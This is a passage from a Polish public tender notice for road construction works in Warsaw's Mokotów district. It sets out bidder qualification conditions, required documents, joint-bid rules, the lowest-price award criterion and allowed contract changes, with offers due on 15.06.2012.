</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający oceni jako spełniony, warunek dysponowania przez Wykonawcę osobami, które będą uczestniczyć w wykonywaniu zamówienia  na podstawie wykazu osób, oraz informacji o podstawie do dysponowania tymi osobami, z którego wynikać będzie, że Wykonawca dysponuje osobą, która będzie odpowiadała za kierowanie drogowymi robotami budowlanymi oraz, że dysponuje co najmniej siedmioma osobami do wykonania zamówienia, z doświadczeniem i kwalifikacjami w wykonywaniu robót drogowych. W w/w wykazie należy podać informacje na temat kwalifikacji zawodowych tych osób, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności i podstawie do dysponowania nimi. W tym celu Wykonawca musi wypełnić wykaz osób stanowiący załącznik nr 8 do wzoru formularza oferty. 
2. Zamawiający oceni jako spełniony, warunek dysponowania przez Wykonawcę osobą z uprawnieniami, wymaganymi ustawą prawo budowlane, która będzie uczestniczyć w wykonywaniu zamówienia na podstawie oświadczenia, z którego wynikać będzie, że Wykonawca dysponuje osobą do kierowania robotami budowlanymi będącymi przedmiotem zamówienia - posiadającą odpowiednie uprawnienia budowlane bez ograniczeń do kierowania robotami drogowymi lub odpowiedni dokument stwierdzający przygotowanie zawodowe do kierowania budową i robotami w zakresie drogowym oraz wpisaną na listę członków właściwej izby samorządu zawodowego. W tym celu Wykonawca musi złożyć oświadczenie na załącznik nr 9 do wzoru formularza oferty.
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej 
i finansowej na podstawie sprawozdania finansowego albo jego części  
a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o  badanym sprawozdaniu albo jego części, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności za 2010 rok, a jeżeli  okres prowadzenia działalności, jest krótszy - za ten okres potwierdzających wysokość posiadanych obrotów w 2010 r. roku nie mniejszych niż 200.000,-  PLN. 
2.Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzającej posiadanie w/w ubezpieczenia OC przez Wykonawcę na kwotę co najmniej  100.000,- PLN.
3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. 	Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 15.  specyfikacji istotnych warunków zamówienia i w formie określonej w  specyfikacji:
         1.1. 	wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia,
1.2. 	wypełniony i podpisany kosztorys ofertowy na załączniku nr 1 do oferty wg wzoru załączonego do wzoru formularza oferty,
1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2. niniejszej specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,
1.4. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. niniejszej specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
1.5. 	informację o części / częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,
   1.6. 	dokument potwierdzający wniesienie wadium w formie określonej w pkt 12.2. specyfikacji istotnych warunków zamówienia,
   1.7. 	informację o podmiotach, które będą brały udział w realizacji części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt 8.2. siwz, 
1.8. 	oświadczenie o zapoznaniu się i akceptacji dokumentacji projektowej: Projektu wykonawczego i szczegółowej specyfikacji technicznej wykonania i odbioru robót oraz kosztorysu nakładczego na załączniku nr 2 wg wzoru załączonego do wzoru formularza oferty, 
  1.9. 	zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty, 
 1.10.	oświadczenie na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 100.000,- złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
           1.11. 	informację określoną w pkt. 16.1.2. niniejszej specyfikacji w przypadku 	zastosowania  przez Wykonawcę innej niż 23 % stawki podatku od towarów i usług,
1.12. 	oświadczenie Wykonawcy zawierające wzór dokumentu gwarancyjnego określającego zakres gwarancji na załączniku nr 5 do oferty wg wzoru załączonego 	do wzoru formularza oferty, potwierdzające udzielenie gwarancji  na przedmiot składanej przez siebie oferty na okres nie krótszy niż wskazany w pkt. 8.1.4. niniejszej specyfikacji,
1.13.  dowód wniesienia wadium.
2. W celu wykazania spełniania przez Wykonawcę warunków udziału 
w postępowaniu, o  których mowa w pkt 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
2.1. oświadczenie na załączniku nr 6 do oferty wg wzoru załączonego do wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, 
2.2. 	wykaz robót, o których mowa w pkt. 8.1.1. niniejszej specyfikacji na załączniku nr 7 do oferty wg wzoru załączonego do wzoru formularza oferty, wykonanych przez Wykonawcę zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
2.3. 	wykaz osób które będą uczestniczyć w wykonaniu zamówienia, o których mowa w pkt. 8.1.2. specyfikacji na załączniku nr 8 do oferty wg wzoru załączonego do wzoru formularza oferty,
2.4. oświadczenie, o którym mowa w pkt. 8.1.3. specyfikacji  dotyczące posiadania uprawnień przez osobę, która będzie pełniła funkcję kierownika budowy, na załączniku nr 9 do oferty wg wzoru załączonego do wzoru formularza oferty,
2.5. 	sprawozdanie finansowe albo jego część  a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o  badanym sprawozdaniu albo jego części, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności za 2010 r., a jeżeli  okres prowadzenia działalności, jest krótszy - za ten okres potwierdzających wysokość posiadanych obrotów w 2010 roku nie mniejszych niż  200.000,- PLN.
2.6. opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 
co najmniej  100.000,- PLN.
2.7. dokumenty potwierdzające, że roboty wykazane przez Wykonawcę w załączniku nr 7 do oferty (zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
2.8. 	pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.
3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
3.1. 	oświadczenie na załączniku nr 10 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
3.2. 	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy, 
3.3. 	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
3.4. 	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert, 
3.5. 	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy (dla osoby), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3.6. 	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy (dla podmiotu zbiorowego), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3.7. 	Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8 ustawy mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust.1 pkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, z tym że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.
3.8.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt 9.3 SIWZ, odnoszące się do tych podmiotów.
4. Zamawiający nie wymaga złożenia dokumentów na potwierdzenie, że oferowane roboty budowlane  odpowiadają wymaganiom określonym przez Zamawiającego.
5. Oferta wspólna
5.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania: 
5.1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
5.1.2. 	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność 
z oryginałem przez notariusza lub inny dokument (np. umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
5.1.3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
5.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 ustawy. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.3.2. do 9.3.7.  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
5.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;
5.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.
5.3. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
6. 	W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.
7. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
         7.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.3.2. i 9.3.6. specyfikacji -  składa dokument lub dokumenty wystawione 
w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
7.1.1. 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
 7.1.2.	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
7.1.3. 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa w pkt 9.7.7.1. i 9.7.7.3. SIWZ powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w pkt 9.7.1.2. SIWZ, powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
 7.2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w pkt 9.3.5. SIWZ, składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
          7.3. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 9.7.1. oraz w pkt 9.7.2 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt 9.7.1 i pkt 9.7.2 SIWZ odnoszące się do wymaganych terminów ważności poszczególnych dokumentów stosuje się odpowiednio. 
8. w przypadku, gdy wykonawca w miejsce któregoś z dokumentów, 
o których mowa w pkt 9.2.5. do 9.2.7., 9.3.2. do 9.3.6., 9.7.1.1., 9.7.2., 9.7.3.  specyfikacji dostarczy jego kopię, kopia ta musi być poświadczona za zgodność z oryginałem zgodnie z zapisem pkt. 14.6.4 specyfikacji istotnych warunków zamówienia przy czym w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 14.6.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości.
9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty 
i oświadczenia sporządzone w języku obcym, są składane wraz z tłumaczeniem  na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania, o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych 
w specyfikacji istotnych warunków zamówienia w tym: 
1.1.W przypadku wystąpienia okoliczności uniemożliwiających prowadzenie robót zgodnie z technologią ich wykonania termin realizacji robót może ulec zmianie. Zostanie on wydłużony o okres, na który roboty zostały wstrzymane. Fakt ten musi być potwierdzony wpisem Zamawiającego do dziennika robót, o którym mowa w § 1  ust. 6 Istotnych postanowień umowy.
1.2.Zamawiający zastrzega sobie możliwość rezygnacji z wykonania części robót objętych Zamówieniem, nie więcej jednak niż 20 % wartości zamówienia. 
1.3.W trakcie realizacji przedmiotu zamówienia Wykonawca może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony uprzednio innym Podwykonawcom.
1.4. W przypadku zaistnienia konieczności wykonania robót dodatkowych, które nie zostały przewidziane w przedmiarze robót stanowiącym zał. nr 2 do Istotnych postanowień umowy (Rozdział III siwz), koniecznych do wykonania przedmiotu zamówienia Wykonawca zobowiązany jest wykonać je na odrębne zlecenie Zamawiającego. Wartość robót dodatkowych nie może  przekroczyć 50% wartości realizowanego zamówienia. 
Zmiany, o których mowa wyżej wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul.Irysowa 19, 02-660 Warszawa, pok.34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 10:00, miejsce: ul.Irysowa 19,02-660 Warszawa, pok.34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





